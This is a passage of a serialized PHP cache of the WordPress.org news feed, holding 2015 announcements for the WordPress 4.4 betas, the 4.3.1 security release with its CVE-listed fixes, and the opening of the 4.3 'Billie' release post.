                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.4 Beta 4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2015/11/wordpress-4-4-beta-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Nov 2015 00:04:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=3977\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:337:\"WordPress 4.4 Beta 4 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.4, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Scott Taylor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1407:\"

                                                                WordPress 4.4 Beta 4 is now available!

                                                                \n

                                                                This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.4, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the beta here (zip).

                                                                \n

                                                                For more information about what’s new in version 4.4, check out the Beta 1 blog post. This our final planned beta. Next week will be our first Release Candidate.

                                                                \n

                                                                If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. Or, if you’re comfortable writing a bug report, file one on the WordPress Trac. There, you can also find a list of known bugs and everything we’ve fixed.

                                                                \n

                                                                Closer To The End
                                                                \nTickets Are Being Shuffled
                                                                \nOnward to RC

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.4 Beta 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2015/11/wordpress-4-4-beta-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Nov 2015 22:10:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=3969\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:374:\"WordPress 4.4 Beta 3 is now available for download and testing. This is software still in development, so we don’t recommend that you run it on a production site. To get the beta, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the beta here (zip). For more of what’s new in version 4.4, check out […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Scott Taylor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1245:\"

                                                                WordPress 4.4 Beta 3 is now available for download and testing. This is software still in development, so we don’t recommend that you run it on a production site. To get the beta, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the beta here (zip).

                                                                \n

                                                                For more of what’s new in version 4.4, check out the Beta 1 blog post.

                                                                \n

                                                                If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. Or, if you’re comfortable writing a bug report, file one on the WordPress Trac. There, you can also find a list of known bugs and everything we’ve fixed.

                                                                \n

                                                                Four-four beta three
                                                                \nEven more activity
                                                                \nNary a shared term

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.4 Beta 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2015/10/wordpress-4-4-beta-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Oct 2015 20:50:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=3966\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:374:\"WordPress 4.4 Beta 2 is now available for download and testing. This is software still in development, so we don’t recommend that you run it on a production site. To get the beta, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the beta here (zip). For more of what’s new in version 4.4, check out […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Scott Taylor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1246:\"

                                                                WordPress 4.4 Beta 2 is now available for download and testing. This is software still in development, so we don’t recommend that you run it on a production site. To get the beta, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the beta here (zip).

                                                                \n

                                                                For more of what’s new in version 4.4, check out the Beta 1 blog post.

                                                                \n

                                                                If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. Or, if you’re comfortable writing a bug report, file one on the WordPress Trac. There, you can also find a list of known bugs and everything we’ve fixed.

                                                                \n

                                                                Four-four beta two
                                                                \nAnother week of progress
                                                                \nREST API lives!

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.4 Beta 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2015/10/wordpress-4-4-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 22 Oct 2015 23:54:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=3926\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:329:\"WordPress 4.4 Beta 1 is now available! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.4, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Scott Taylor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4293:\"

                                                                WordPress 4.4 Beta 1 is now available!

                                                                \n

                                                                This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.4, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the beta here (zip).

                                                                \n

                                                                WordPress 4.4 is slated for release on December 8, but to get there, we need your help testing what we have been working on, including:

                                                                \n
                                                                  \n
                                                                • Twenty Sixteen — The newest default theme for WordPress.
                                                                • \n
                                                                • Responsive Images — WordPress automatically delivers a more appropriate image to users depending on a variety of conditions like screen size, viewport size, and screen resolution.
                                                                • \n
                                                                • Embeds — WordPress can now embed rich content from nearly all sites that support the oEmbed standard — not just YouTube, Flickr, Twitter, and the like. You can even embed previews of posts from other WordPress sites by pasting the URL on its own line.
                                                                • \n
                                                                \n

                                                                There have been a lot of changes for developers to play with as well:

                                                                \n
                                                                  \n
                                                                • REST API (phase 1) — The underlying infrastructure of the WordPress REST API plugin has been included in WordPress 4.4. Plugin authors can take advantage of this by adding custom endpoints.
                                                                • \n
                                                                • Term Metadata — Taxonomy term metadata is now included in WordPress 4.4. If you’ve already been using a plugin to implement term metadata, you should read this post on how to prepare. Also, the underlying WP_Term class improves caching when working with terms. (#14162)
                                                                • \n
                                                                • Improved <title> outputwp_title() is now deprecated; WordPress can handle the rendering of the document title automatically.
                                                                • \n
                                                                • Comments — Comment queries are now split for performance. Also, the underlying WP_Comment class improves caching and introduces strong-typing. (#8071#32619)
                                                                • \n
                                                                \n

                                                                If you want a more in-depth view of what major changes have made it into 4.4, check out all 4.4-tagged posts on the main development blog, or check out a list of everything that’s changed.

                                                                \n

                                                                If you think you’ve found a bug, you can post to the Alpha/Beta area in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, file one on the WordPress Trac. There, you can also find a list of known bugs.

                                                                \n

                                                                Happy testing!

                                                                \n

                                                                Many small changes
                                                                \nSome groundbreaking new features
                                                                \nFun times had by all
                                                                \n

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 4.3.1 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2015/09/wordpress-4-3-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 15 Sep 2015 15:22:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3914\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:439:\"WordPress 4.3.1 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. This release addresses three issues, including two cross-site scripting vulnerabilities and a potential privilege escalation. WordPress versions 4.3 and earlier are vulnerable to a cross-site scripting vulnerability when processing shortcode tags (CVE-2015-5714). Reported by […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Samuel Sidler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4022:\"
                                                                \n

                                                                WordPress 4.3.1 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

                                                                \n

                                                                This release addresses three issues, including two cross-site scripting vulnerabilities and a potential privilege escalation.

                                                                \n
                                                                  \n
                                                                • WordPress versions 4.3 and earlier are vulnerable to a cross-site scripting vulnerability when processing shortcode tags (CVE-2015-5714). Reported by Shahar Tal and Netanel Rubin of Check Point.
                                                                • \n
                                                                • A separate cross-site scripting vulnerability was found in the user list table. Reported by Ben Bidner of the WordPress security team.
                                                                • \n
                                                                • Finally, in certain cases, users without proper permissions could publish private posts and make them sticky (CVE-2015-5715). Reported by Shahar Tal and Netanel Rubin of Check Point.
                                                                • \n
                                                                \n

                                                                Our thanks to those who have practiced responsible disclosure of security issues.

                                                                \n

                                                                WordPress 4.3.1 also fixes twenty-six bugs. For more information, see the release notes or consult the list of changes.

                                                                \n

                                                                Download WordPress 4.3.1 or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.3.1.

                                                                \n
                                                                \n

                                                                Thanks to everyone who contributed to 4.3.1:

                                                                \n

                                                                Adam Silverstein, Andrea FerciaAndrew Ozz, Boone Gorges, Brandon Kraft, chriscct7, Daisuke Takahashi, Dion Hulse, Dominik Schilling, Drew Jaynes, dustinbolton, Gary Pendergast, hauvong, James Huff, Jeremy Felt, jobst, Marin Atanasov, Nick Halsey, nikeo, Nikolay Bachiyski, Pascal Birchler, Paul Ryan, Peter Wilson, Robert Chapin, Samuel Wood, Scott Taylor, Sergey Biryukov, tmatsuur, Tracy Levesque, Umesh Nevase, vortfu, welcher, Weston Ruter

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:36:\"\n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"WordPress 4.3 “Billie”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://wordpress.org/news/2015/08/billie/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Aug 2015 19:12:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"4.3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3845\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:352:\"Version 4.3 of WordPress, named “Billie” in honor of jazz singer Billie Holiday, is available for download or update in your WordPress dashboard. New features in 4.3 make it even easier to format your content and customize your site. Menus in the Customizer Create your menu, update it, and assign it, all while live-previewing in […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:22292:\"

                                                                \"WordPress

                                                                \n

                                                                Version 4.3 of WordPress, named “Billie” in honor of jazz singer Billie Holiday, is available for download or update in your WordPress dashboard. New features in 4.3 make it even easier to format your content and customize your site.

                                                                \n

                                                                \n
                                                                \n

                                                                Menus in the Customizer

                                                                \n
                                                                \"\"
                                                                \n

                                                                Create your menu, update it, and assign it, all while live-previewing in the customizer. The streamlined customizer design provides a mobile-friendly and accessible interface. With every release, it becomes easier and faster to make your site just the way you want it.

                                                                \n
                                                                \n

                                                                Formatting Shortcuts

                                                                \n


                                                                \nYour writing flow just got faster with new formatting shortcuts in WordPress 4.3. Use asterisks to create lists and number signs to make a heading. No more breaking your flow; your text looks great with a * and a #.

                                                                \n
                                                                \n

                                                                Site Icons

                                                                \n

                                                                \"\"
                                                                \n 
                                                                \nSite icons represent your site in browser tabs, bookmark menus, and on the home screen of mobile devices. Add your unique site icon in the customizer; it will even stay in place when you switch themes. Make your whole site reflect your brand.

                                                                \n
                                                                \n

                                                                Better Passwords

                                                                \n

                                                                \"\"
                                                                \n 
                                                                \nKeep your site more secure with WordPress’ improved approach to passwords. Instead of receiving passwords via email, you’ll get a password reset link. When you add new users to your site or edit a user profile, WordPress will automatically generate a secure password.

                                                                \n
                                                                \n

                                                                Other improvements

                                                                \n
                                                                  \n
                                                                • A smoother admin experience – Refinements to the list view across the admin make your WordPress more accessible and easier to work with on any device.
                                                                • \n
                                                                • Comments turned off on pages – All new pages that you create will have comments turned off. Keep discussions to your blog, right where they’re supposed to happen.
                                                                • \n
                                                                • Customize your site quickly – Wherever you are on the front-end, you can click the customize link in the toolbar to swiftly make changes to your site.
                                                                • \n
                                                                \n
                                                                \n

                                                                The Team

                                                                \n

                                                                \"KonstantinThis release was led by Konstantin Obenland, with the help of these fine individuals. There are 246 contributors with props in this release. Pull up some Billie Holiday on your music service of choice, and check out some of their profiles:

                                                                \n@mercime, Aaron D. Campbell, Aaron Jorbin, Adam Heckler, Adam Silverstein, Aki Bjorklund, Alex Kirk, Alex Mills (Viper007Bond), Alex Shiels, Alin Marcu, andfinally, Andrea Fercia, Andrea Gandino, Andrew Nacin, Andrew Ozz, Andy Fragen, Ankit K Gupta, Anthony Burchell, anubisthejackle, Aram Zucker-Scharff, Arjun S Kumar, avnarun, Bad Feather, Ben Cole, Ben Dunkle, BinaryKitten, Birgir Erlendsson (birgire), Bjorn Johansen, bolo1988, Boone B. Gorges, Brad Touesnard, Bram Duvigneau, Brandon Kraft, Brian Krogsgard, Brian Layman, Caleb Burks, CalEvans, Chase Wiseman, Chip Bennett, Chouby, Chris Olbekson, chriscct7, Craig Ralston, Daisuke Takahashi, Daniel Bachhuber, Daniel Jalkut (Red Sweater), Daniele Scasciafratte, daniluk4000, Dave McHale, DaveAl, David A. Kennedy, David Herrera, daxelrod, Denis de Bernardy, Dennis Ploetner, Derek Herman, DH-Shredder, Dion Hulse, dipesh.kakadiya, dmsnell, Dominik Schilling, Drew Jaynes, dustinbolton, Dzikri Aziz, eclev91, eligijus, Elio Rivero, Ella Iseulde Van Dorpe, Eric Andrew Lewis, Eric Binnion, Eric Mann, Fabien Quatravaux, Felix Arntz, francoeurdavid, Frank Klein, gabrielperezs, Garth Mortensen, Gary Jones, Gary Pendergast, George Stephanis, glennm, gtuk, hailin, hauvong, Helen Hou-Sandí, henrikakselsen, Hinaloe, Hrishikesh Vaipurkar, Hugo Baeta, Iain Poulson, imath, Ipstenu (Mika Epstein), isaacchapman, izem, J.D. Grimes, Jack Lenox, jadpm, James Huff, jamesgol, jancbeck, Jeff Farthing, Jeremy Felt, Jeremy Pry, Jeremy Ward, Jesin A, jipmoors, jjberry, Jobst Schmalenbach, Joe Dolson, Joe Hoyle, Joe McGill, Joey Kudish, John Blackbourn, John James Jacoby, John Leschinski, Joost de Valk, Josh Davis, Jpyper, jrf, Julio Potier, Justin Sternberg, Kai Jacobsen, karinchristen, karpstrucking, Kelly Dwan, Kevin Koehler, kitchin, Kite, Konstantin Kovshenin, Lance Willett, Lee Willis, Leo Gopal, loushou, Lumaraf, Marin Atanasov, Mario Peshev, Marius (Clorith), Mark Jaquith, Marko Heijnen, marsjaninzmarsa, martinsachse, Matt Mullenweg, Matt van Andel, Matt Wiebe, mattyrob, Mel Choyce, Michael, Michael Adams (mdawaffe), Michael Arestad, michaelryanmcneill, Mickey Kay, mihai, Mike Hansen, Mike Nelson, Milan Dinic, Morgan Estes, mrutz, nabil_kadimi, Naoko Takano, Nazmul Hossain Nihal, nicholas_io, Nick Halsey, Nick Momrik, nikeo, Nikolay Bachiyski, Nilambar Sharma, Onni Hakala, Ozh, Paresh Radadiya, Pascal Birchler, Paul Gibbs, Paul Ryan, Paul Wilde, pavelevap, Pete Nelson, Peter Wilson, PeterRKnight, Philip Arthur 